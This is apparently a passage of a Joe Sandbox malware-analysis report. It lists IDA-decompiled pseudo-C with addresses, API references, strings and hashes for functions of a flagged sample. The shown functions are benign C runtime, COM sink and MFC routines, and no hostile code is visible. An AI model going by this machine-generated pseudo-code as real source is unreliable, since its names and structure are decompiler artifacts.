				intOrPtr _t70;
				intOrPtr _t77;

				if( *0xa06020 != 0xffffffff) {
					E0095C490( &_v12);
					_t32 =  *0xa06020; // 0x5
					_v16 = E0096B300(_t32);
					if(_v16 != 0xffffffff) {
						if(_v16 == 0) {
							_t77 =  *0xa06020; // 0x5
							if(E0096B340(_t77, 0xffffffff) != 0) {
								E0095C470( &_v8, L009992C0( &_v12, __edi, 1, 0x28, 2, "d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\internal\\per_thread_data.cpp", 0x80));
								if((E0095C4F0( &_v8) & 0x000000ff) != 0) {
									if((E0095C5B0(E0095C540( &_v8)) & 0x000000ff) != 0) {
										_v40 = E0095C510( &_v8);
										E0095C4B0( &_v8);
										E0095C4D0( &_v12);
										return _v40;
									}
									_t45 =  *0xa06020; // 0x5
									E0096B340(_t45, 0);
									_v36 = 0;
									E0095C4B0( &_v8);
									E0095C4D0( &_v12);
									return _v36;
								}
								_t70 =  *0xa06020; // 0x5
								E0096B340(_t70, 0);
								_v32 = 0;
								E0095C4B0( &_v8);
								E0095C4D0( &_v12);
								return _v32;
							}
							_v28 = 0;
							E0095C4D0( &_v12);
							return _v28;
						}
						_v24 = _v16;
						E0095C4D0( &_v12);
						return _v24;
					}
					_v20 = 0;
					E0095C4D0( &_v12);
					return _v20;
				}
				return 0;
			}
















                      0x0095c69d
                      0x0095c6a9
                      0x0095c6ae
                      0x0095c6bc
                      0x0095c6c3
                      0x0095c6e0
                      0x0095c6fa
                      0x0095c70b
                      0x0095c740
                      0x0095c752
                      0x0095c797
                      0x0095c7cd
                      0x0095c7d3
                      0x0095c7db
                      0x00000000
                      0x0095c7e0
                      0x0095c79b
                      0x0095c7a1
                      0x0095c7a9
                      0x0095c7b3
                      0x0095c7bb
                      0x00000000
                      0x0095c7c0
                      0x0095c756
                      0x0095c75d
                      0x0095c765
                      0x0095c76f
                      0x0095c777
                      0x00000000
                      0x0095c77c
                      0x0095c70d
                      0x0095c717
                      0x00000000
                      0x0095c71c
                      0x0095c6e5
                      0x0095c6eb
                      0x00000000
                      0x0095c6f0
                      0x0095c6c5
                      0x0095c6cf
                      0x00000000
                      0x0095c6d4
                      0x00000000

                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 0095C729
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
                      • API String ID: 0-1094830976
                      • Opcode ID: 31d87831dd84da36a741ba5c6ec91d06437f22f4638cc0ee4ce72e98880a5cbf
                      • Instruction ID: e7658cfe9b3fb98c5745acad9cf9a5ee2ec97a7769cd069a8aec95dc61609e8d
                      • Opcode Fuzzy Hash: 31d87831dd84da36a741ba5c6ec91d06437f22f4638cc0ee4ce72e98880a5cbf
                      • Instruction Fuzzy Hash: 913140F0D40309AFCB04EFA6D852FFE7774AF5430AF504194E81166291EB74AB09CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009D0840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E009D0840(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v144;
				char _v156;
				void _v164;
				signed int _t26;
				signed int _t27;
				void* _t33;
				void* _t38;
				intOrPtr _t45;
				void* _t56;
				void* _t59;
				void* _t63;
				signed int _t65;
				void* _t66;

				_t56 = __edx;
				_push(0xffffffff);
				_push(0x9d5680);
				_push( *[fs:0x0]);
				_push(__edi);
				_push(__ecx);
				memset( &_v164, 0xcccccccc, 0x25 << 2);
				_pop(_t45);
				_t26 =  *0xa0600c; // 0x5d529087
				_t27 = _t26 ^ _t65;
				_v20 = _t27;
				 *[fs:0x0] =  &_v16;
				_v24 = _t45;
				_v28 = 0;
				_v32 = E00941AB0();
				_v36 = 0;
				_v40 = 0;
				E00992DE0( &_v144, 0x64, "Server Walking for Sink No. XX.");
				E00954B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
				_v8 = 0;
				_t33 = L00942F30( &_v156);
				_t16 = _v24 + 0x24; // 0xf0000ff
				E00955CB0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
				_v164 = 1;
				_v8 = 0xffffffff;
				E009430B0( &_v156, __esi);
				_push(_v24);
				_push(_v164);
				E009D14C0(_t65, 0x9d0944);
				_pop(_t38);
				_pop(_t59);
				 *[fs:0x0] = _v16;
				_t63 = _t27;
				return E009D1520(E00957280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
			}
























                      0x009d0840
                      0x009d0843
                      0x009d0845
                      0x009d0850
                      0x009d0857
                      0x009d0858
                      0x009d0869
                      0x009d086b
                      0x009d086c
                      0x009d0871
                      0x009d0873
                      0x009d087a
                      0x009d0880
                      0x009d0883
                      0x009d088f
                      0x009d0892
                      0x009d0899
                      0x009d08ae
                      0x009d08c3
                      0x009d08c8
                      0x009d08d5
                      0x009d08de
                      0x009d08e1
                      0x009d08e6
                      0x009d08f0
                      0x009d08fd
                      0x009d0908
                      0x009d090b
                      0x009d0912
                      0x009d0917
                      0x009d0918
                      0x009d091c
                      0x009d0924
                      0x009d093f

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009D08AE
                        • Part of subcall function 00955CB0: VariantInit.OLEAUT32(?), ref: 00955DA4
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009D0912
                        • Part of subcall function 009D14C0: _RTC_StackFailure.LIBCMTD ref: 009D1501
                      Strings
                      • Server Walking for Sink No. XX., xrefs: 009D08A0
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Walking for Sink No. XX.
                      • API String ID: 2532982526-2197370697
                      • Opcode ID: 592984c112f73af30217cf19cb6286e1a8e5909350734e41ccc143eb43e0cf80
                      • Instruction ID: a2d2f1c893c037371a2ffae1d461422cc7d7af16da1bd4aa21555af04eaa325e
                      • Opcode Fuzzy Hash: 592984c112f73af30217cf19cb6286e1a8e5909350734e41ccc143eb43e0cf80
                      • Instruction Fuzzy Hash: 5421A172E002089FDB10DFA4DC51BEEB7B4FB84314F40826AE519A73C1DB755A48CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009D0980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E009D0980(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v144;
				char _v156;
				void _v164;
				signed int _t26;
				signed int _t27;
				void* _t33;
				void* _t38;
				intOrPtr _t45;
				void* _t56;
				void* _t59;
				void* _t63;
				signed int _t65;
				void* _t66;

				_t56 = __edx;
				_push(0xffffffff);
				_push(0x9d56ba);
				_push( *[fs:0x0]);
				_push(__edi);
				_push(__ecx);
				memset( &_v164, 0xcccccccc, 0x25 << 2);
				_pop(_t45);
				_t26 =  *0xa0600c; // 0x5d529087
				_t27 = _t26 ^ _t65;
				_v20 = _t27;
				 *[fs:0x0] =  &_v16;
				_v24 = _t45;
				_v28 = 0;
				_v32 = E00941AB0();
				_v36 = 0;
				_v40 = 0;
				E00992DE0( &_v144, 0x64, "Server Paddling for Sink No. XX.");
				E00954B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
				_v8 = 0;
				_t33 = L00942F30( &_v156);
				_t16 = _v24 + 0x24; // 0xff9bc2e8
				E00955AB0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
				_v164 = 1;
				_v8 = 0xffffffff;
				E009430B0( &_v156, __esi);
				_push(_v24);
				_push(_v164);
				E009D14C0(_t65, 0x9d0a84);
				_pop(_t38);
				_pop(_t59);
				 *[fs:0x0] = _v16;
				_t63 = _t27;
				return E009D1520(E00957280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
			}
























                      0x009d0980
                      0x009d0983
                      0x009d0985
                      0x009d0990
                      0x009d0997
                      0x009d0998
                      0x009d09a9
                      0x009d09ab
                      0x009d09ac
                      0x009d09b1
                      0x009d09b3
                      0x009d09ba
                      0x009d09c0
                      0x009d09c3
                      0x009d09cf
                      0x009d09d2
                      0x009d09d9
                      0x009d09ee
                      0x009d0a03
                      0x009d0a08
                      0x009d0a15
                      0x009d0a1e
                      0x009d0a21
                      0x009d0a26
                      0x009d0a30
                      0x009d0a3d
                      0x009d0a48
                      0x009d0a4b
                      0x009d0a52
                      0x009d0a57
                      0x009d0a58
                      0x009d0a5c
                      0x009d0a64
                      0x009d0a7f

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009D09EE
                        • Part of subcall function 00955AB0: VariantInit.OLEAUT32(?), ref: 00955BA4
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009D0A52
                        • Part of subcall function 009D14C0: _RTC_StackFailure.LIBCMTD ref: 009D1501
                      Strings
                      • Server Paddling for Sink No. XX., xrefs: 009D09E0
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Paddling for Sink No. XX.
                      • API String ID: 2532982526-3374743945
                      • Opcode ID: 9671f9d7fe6c2611ef6e8027d10c6c0d4dbde615cf4e24dde4492722f423ea18
                      • Instruction ID: 728c2c1d85d5e5626c03e85de06f2a43eeb2e810a589f47229987bc3fbeb9648
                      • Opcode Fuzzy Hash: 9671f9d7fe6c2611ef6e8027d10c6c0d4dbde615cf4e24dde4492722f423ea18
                      • Instruction Fuzzy Hash: 3521A1B2E042089FDB10DF94DC51BAEB7B4FB88314F40826AE419A7381DB755A48CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009D0AC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E009D0AC0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v144;
				char _v156;
				void _v164;
				signed int _t26;
				signed int _t27;
				void* _t33;
				void* _t38;
				intOrPtr _t45;
				void* _t56;
				void* _t59;
				void* _t63;
				signed int _t65;
				void* _t66;

				_t56 = __edx;
				_push(0xffffffff);
				_push(0x9d56f4);
				_push( *[fs:0x0]);
				_push(__edi);
				_push(__ecx);
				memset( &_v164, 0xcccccccc, 0x25 << 2);
				_pop(_t45);
				_t26 =  *0xa0600c; // 0x5d529087
				_t27 = _t26 ^ _t65;
				_v20 = _t27;
				 *[fs:0x0] =  &_v16;
				_v24 = _t45;
				_v28 = 0;
				_v32 = E00941AB0();
				_v36 = 0;
				_v40 = 0;
				E00992DE0( &_v144, 0x64, "Server Flapping for Sink No. XX.");
				E00954B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
				_v8 = 0;
				_t33 = L00942F30( &_v156);
				_t16 = _v24 + 0x24; // 0xb70f0000
				E009558B0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
				_v164 = 1;
				_v8 = 0xffffffff;
				E009430B0( &_v156, __esi);
				_push(_v24);
				_push(_v164);
				E009D14C0(_t65, 0x9d0bc4);
				_pop(_t38);
				_pop(_t59);
				 *[fs:0x0] = _v16;
				_t63 = _t27;
				return E009D1520(E00957280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
			}
























                      0x009d0ac0
                      0x009d0ac3
                      0x009d0ac5
                      0x009d0ad0
                      0x009d0ad7
                      0x009d0ad8
                      0x009d0ae9
                      0x009d0aeb
                      0x009d0aec
                      0x009d0af1
                      0x009d0af3
                      0x009d0afa
                      0x009d0b00
                      0x009d0b03
                      0x009d0b0f
                      0x009d0b12
                      0x009d0b19
                      0x009d0b2e
                      0x009d0b43
                      0x009d0b48
                      0x009d0b55
                      0x009d0b5e
                      0x009d0b61
                      0x009d0b66
                      0x009d0b70
                      0x009d0b7d
                      0x009d0b88
                      0x009d0b8b
                      0x009d0b92
                      0x009d0b97
                      0x009d0b98
                      0x009d0b9c
                      0x009d0ba4
                      0x009d0bbf

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009D0B2E
                        • Part of subcall function 009558B0: VariantInit.OLEAUT32(?), ref: 009559A4
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009D0B92
                        • Part of subcall function 009D14C0: _RTC_StackFailure.LIBCMTD ref: 009D1501
                      Strings
                      • Server Flapping for Sink No. XX., xrefs: 009D0B20
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Flapping for Sink No. XX.
                      • API String ID: 2532982526-3528622240
                      • Opcode ID: 9b9c3a72e03a0f0d36d6f125e31b29ffb89a087418b8d4978afb7b5d348236a5
                      • Instruction ID: 26cde91a171d875055d068ac01e5e92cafb4b4c746bcbf2dea5930a0ab0ee3cc
                      • Opcode Fuzzy Hash: 9b9c3a72e03a0f0d36d6f125e31b29ffb89a087418b8d4978afb7b5d348236a5
                      • Instruction Fuzzy Hash: 0421A172D042089FDB10DFA4DC41BAEB7B4FB84314F4082AAE519A73C1DB755A48CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009D0C00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E009D0C00(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v144;
				char _v156;
				void _v164;
				signed int _t26;
				signed int _t27;
				void* _t33;
				void* _t38;
				intOrPtr _t45;
				void* _t56;
				void* _t59;
				void* _t63;
				signed int _t65;
				void* _t66;

				_t56 = __edx;
				_push(0xffffffff);
				_push(0x9d572e);
				_push( *[fs:0x0]);
				_push(__edi);
				_push(__ecx);
				memset( &_v164, 0xcccccccc, 0x25 << 2);
				_pop(_t45);
				_t26 =  *0xa0600c; // 0x5d529087
				_t27 = _t26 ^ _t65;
				_v20 = _t27;
				 *[fs:0x0] =  &_v16;
				_v24 = _t45;
				_v28 = 0;
				_v32 = E00941AB0();
				_v36 = 0;
				_v40 = 0;
				E00992DE0( &_v144, 0x64, "Server Quacking for Sink No. XX.");
				E00954B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
				_v8 = 0;
				_t33 = L00942F30( &_v156);
				_t16 = _v24 + 0x24; // 0xf0000ff
				E009556B0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
				_v164 = 1;
				_v8 = 0xffffffff;
				E009430B0( &_v156, __esi);
				_push(_v24);
				_push(_v164);
				E009D14C0(_t65, 0x9d0d04);
				_pop(_t38);
				_pop(_t59);
				 *[fs:0x0] = _v16;
				_t63 = _t27;
				return E009D1520(E00957280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
			}
























                      0x009d0c00
                      0x009d0c03
                      0x009d0c05
                      0x009d0c10
                      0x009d0c17
                      0x009d0c18
                      0x009d0c29
                      0x009d0c2b
                      0x009d0c2c
                      0x009d0c31
                      0x009d0c33
                      0x009d0c3a
                      0x009d0c40
                      0x009d0c43
                      0x009d0c4f
                      0x009d0c52
                      0x009d0c59
                      0x009d0c6e
                      0x009d0c83
                      0x009d0c88
                      0x009d0c95
                      0x009d0c9e
                      0x009d0ca1
                      0x009d0ca6
                      0x009d0cb0
                      0x009d0cbd
                      0x009d0cc8
                      0x009d0ccb
                      0x009d0cd2
                      0x009d0cd7
                      0x009d0cd8
                      0x009d0cdc
                      0x009d0ce4
                      0x009d0cff

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009D0C6E
                        • Part of subcall function 009556B0: VariantInit.OLEAUT32(?), ref: 009557A4
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009D0CD2
                        • Part of subcall function 009D14C0: _RTC_StackFailure.LIBCMTD ref: 009D1501
                      Strings
                      • Server Quacking for Sink No. XX., xrefs: 009D0C60
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Quacking for Sink No. XX.
                      • API String ID: 2532982526-3989898170
                      • Opcode ID: 2b7b4b398dc1162dc4767e8ec309e8507326d987abc7e99d72c67efde8e15a99
                      • Instruction ID: d55fa5358fa2529da7635f7cf23aef0181001d5e1b01761956b35a4e47477493
                      • Opcode Fuzzy Hash: 2b7b4b398dc1162dc4767e8ec309e8507326d987abc7e99d72c67efde8e15a99
                      • Instruction Fuzzy Hash: DE21A172D042089FDB10DF94DC41BAEB7B4FB84314F50826AE419A73C1DB752A48CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009680D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E009680D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _t15;
				intOrPtr _t36;
				intOrPtr _t37;

				_t15 =  *0xb30640; // 0x0
				if( *_t15 != 0) {
					_push("??_C");
					_v8 = L0095EFF0() - 1;
					_t36 =  *0xb30640; // 0x0
					_v12 = _t36;
					if(E009A2B40(_v12, "??_C", _v8) != 0) {
						E0095F350(_a4, 2);
						return _a4;
					}
					_push("??_C");
					_v20 = L0095EFF0() - 1;
					_t37 =  *0xb30640; // 0x0
					_v16 = _t37;
					 *0xb30640 = _v16 + _v20;
					_push(1);
					E00967F80(__ebx, __edi, __esi, _a4, 0);
					return _a4;
				}
				E0095F350(_a4, 1);
				return _a4;
			}










                      0x009680d6
                      0x009680e0
                      0x009680f1
                      0x00968101
                      0x00968104
                      0x0096810a
                      0x00968124
                      0x00968167
                      0x00000000
                      0x0096816c
                      0x00968126
                      0x00968136
                      0x00968139
                      0x0096813f
                      0x00968148
                      0x0096814d
                      0x00968155
                      0x00000000
                      0x0096815d
                      0x009680e7
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 009680E7
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::Node::makeStatus
                      • String ID: ??_C
                      • API String ID: 637594406-1959642359
                      • Opcode ID: f40fe11a1d3c6c96578a15da6d0d058c4c7feca3630520f3960d539c767311c2
                      • Instruction ID: 49210035cb4c3901e2e0bd1dfd9d20dbc792072bb5062fbc4d20998429b9808c
                      • Opcode Fuzzy Hash: f40fe11a1d3c6c96578a15da6d0d058c4c7feca3630520f3960d539c767311c2
                      • Instruction Fuzzy Hash: D411A9B4A40204ABDB04FF58D852BAE7770BF84304F108154FC199B345EB71EA508B80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094FEA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0094FEA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, unsigned int _a4) {
				signed int _v8;
				char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _t24;
				void* _t25;
				void* _t39;
				void* _t40;

				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_v9 = 0;
				if(_a4 != 0) {
					_t43 = _a4 >> 0x10;
					if(_a4 >> 0x10 == 0) {
						_v16 = _a4 & 0xffff;
						_t24 = E00950D40(_v8, _t43, _v16);
						_t44 = _t24;
						if(_t24 == 0) {
							_t25 = E0094F1C0(0xb33744);
							E009423E0(__ebx, __edi, __esi, _t44, E009423B0( &_v24, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\cstringt.h", 0xa9b), _t25, 2, "Warning: implicit LoadString(%u) failed\n", _v16);
							_t40 = _t40 + 0x14;
						}
						_v9 = 1;
					}
				}
				return E009D1520(_v9, _t39 - _t40 + 0x14);
			}













                      0x0094feab
                      0x0094feae
                      0x0094feb1
                      0x0094feb4
                      0x0094feb7
                      0x0094feba
                      0x0094febd
                      0x0094fec5
                      0x0094fecd
                      0x0094fecf
                      0x0094fedd
                      0x0094fee7
                      0x0094feec
                      0x0094feee
                      0x0094ff00
                      0x0094ff19
                      0x0094ff1e
                      0x0094ff1e
                      0x0094ff21
                      0x0094ff21
                      0x0094fecf
                      0x0094ff35

                      APIs
                      • _Smanip.LIBCPMTD ref: 0094FF13
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\cstringt.h, xrefs: 0094FF0B
                      • Warning: implicit LoadString(%u) failed, xrefs: 0094FEF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
